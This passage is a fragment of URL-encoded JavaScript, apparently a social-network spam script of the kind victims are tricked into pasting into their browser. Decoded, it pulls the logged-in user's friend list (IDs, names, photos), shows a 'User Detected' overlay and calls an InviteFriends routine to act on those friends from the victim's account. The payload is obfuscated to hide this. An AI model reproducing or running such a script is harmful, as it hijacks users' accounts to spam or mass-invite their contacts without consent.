9%6F%6E%73%5B%32%5D%3D%73%6F%72%74%5F%61%6C%70%68%61%26%5F%5F%75%73%65%72%3D%22%20%2B%20%75%73%65%72%5F%69%64%20%2B%20%22%26%5F%5F%61%3D%31%26%5F%5F%64%79%6E%3D%37%6E%38%61%44%35%7A%35%43%46%2D%33%75%69%26%5F%5F%72%65%71%3D%6C%22%2C%20%66%75%6E%63%74%69%6F%6E%20%28%61%29%20%7B%76%61%72%20%62%20%3D%20%61%3B%76%61%72%20%63%20%3D%20%62%2E%73%75%62%73%74%72%69%6E%67%28%62%2E%69%6E%64%65%78%4F%66%28%22%7B%22%29%29%3B%76%61%72%20%64%20%3D%20%4A%53%4F%4E%2E%70%61%72%73%65%28%63%29%3B%64%20%3D%20%64%2E%70%61%79%6C%6F%61%64%2E%65%6E%74%72%69%65%73%3B%66%6F%72%20%28%76%61%72%20%65%20%3D%20%30%3B%20%65%20%3C%20%64%2E%6C%65%6E%67%74%68%3B%20%65%2B%2B%29%20%61%72%72%2E%70%75%73%68%28%64%5B%65%5D%2E%75%69%64%29%3B%66%6F%72%20%28%76%61%72%20%65%67%20%3D%20%30%3B%20%65%67%20%3C%20%64%2E%6C%65%6E%67%74%68%3B%20%65%67%2B%2B%29%20%61%72%6E%2E%70%75%73%68%28%64%5B%65%67%5D%2E%74%65%78%74%29%3B%66%6F%72%20%28%76%61%72%20%70%69%63%20%3D%20%30%3B%20%70%69%63%20%3C%20%64%2E%6C%65%6E%67%74%68%3B%20%70%69%63%2B%2B%29%20%70%68%6F%2E%70%75%73%68%28%64%5B%70%69%63%5D%2E%70%68%6F%74%6F%29%3B%69%20%3D%20%61%72%72%2E%6C%65%6E%67%74%68%20%2D%20%31%3B%74%61%79%20%3D%20%69%3B%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%61%72%72%2E%6C%65%6E%67%74%68%29%3B%76%61%72%20%64%69%73%70%6C%61%79%20%3D%20%22%3C%64%69%76%20%69%64%3D%27%66%72%69%65%6E%64%2D%65%64%67%65%2D%64%69%73%70%6C%61%79%27%20%73%74%79%6C%65%3D%27%70%6F%73%69%74%69%6F%6E%3A%66%69%78%65%64%3B%6C%65%66%74%3A%35%30%25%3B%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%2D%32%37%33%70%78%3B%74%6F%70%3A%31%30%30%70%78%3B%77%69%64%74%68%3A%36%30%30%70%78%3B%7A%2D%69%6E%64%65%78%3A%39%39%39%39%3B%66%6F%6E%74%2D%73%69%7A%65%3A%31%34%70%78%3B%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%3B%70%61%64%64%69%6E%67%3A%31%35%70%78%3B%62%6F%78%2D%73%68%61%64%6F%77%3A%30%70%74%20%31%70%78%20%30%70%74%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%31%29%3B%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%33%70%78%3B%62%6F%72%64%65%72%3A%31%70%78%20%73%6F%6C%69%64%20%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%62%61%63%6B%67%72%6F%75%6E%64%2D%63%6F%6C%6F%72%3A%72%67%62%61%28%30%2C%30%2C%30%2C%30%2E%39%29%3B%63%6F%6C%6F%72%3A%23%66%66%66%66%66%66%27%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%64%69%76%20%73%74%79%6C%65%3D%27%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%31%30%70%78%3B%66%6F%6E%74%2D%73%69%7A%65%3A%32%30%70%78%3B%27%3E%22%20%2B%20%54%69%74%6C%65%20%2B%20%22%3C%2F%64%69%76%3E%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%61%72%72%2E%6C%65%6E%67%74%68%20%2B%20%22%20%55%73%65%72%20%44%65%74%65%63%74%65%64%22%3B%64%69%73%70%6C%61%79%20%2B%3D%20%22%3C%2F%64%69%76%3E%22%3B%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%22%70%61%67%65%6C%65%74%5F%73%69%64%65%62%61%72%22%29%2E%69%6E%6E%65%72%48%54%4D%4C%20%3D%20%64%69%73%70%6C%61%79%3B%49%6E%76%69%74%65%46%72%69%65%6E%64%73%28%61%72%72%5B%69%5D%29%7D%29%3B%76%61%72%20%70%61%72%65%6E%74%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%68%74%6D%6C%22%29%5B%30%5D%3B%76%61%72%20%5F%62%6F%64%79%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%62%6F%64%79%27%29%5B%30%5D%3B%76%61%72%20%5F%64%69%76%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%64%69%76%27%29%3B%5F%64%69%76%2E%73%74%79%6C%65%2E%68%65%69%67%68%74%3D%22%32%35%22%3B%5F%64%69%76%2E%73%74%79%6C%65%2E%77%69%64%74%68%3D%22%31%30%30%25%22%3B%5F%64%69%76%2E%73%74%79%6C%65%2E%70%6F%73%69%74%69%6F%6E%3D%22%66%69%78%65%64%22%3B%5F%64%69%76%2E%73%74%79%6C%65%2E%74%6F%70%3D%22%61%75%74%6F%22%3B%5F%64%69%76%2E%73%74%79%6C%65%2E%62%6F%74%74%6F%6D%3D%22%30%22%3B%5F%64%69%76%2E%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3B%5F%62%6F%64%79%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%5F%64%69%76%29%3B%0A"));
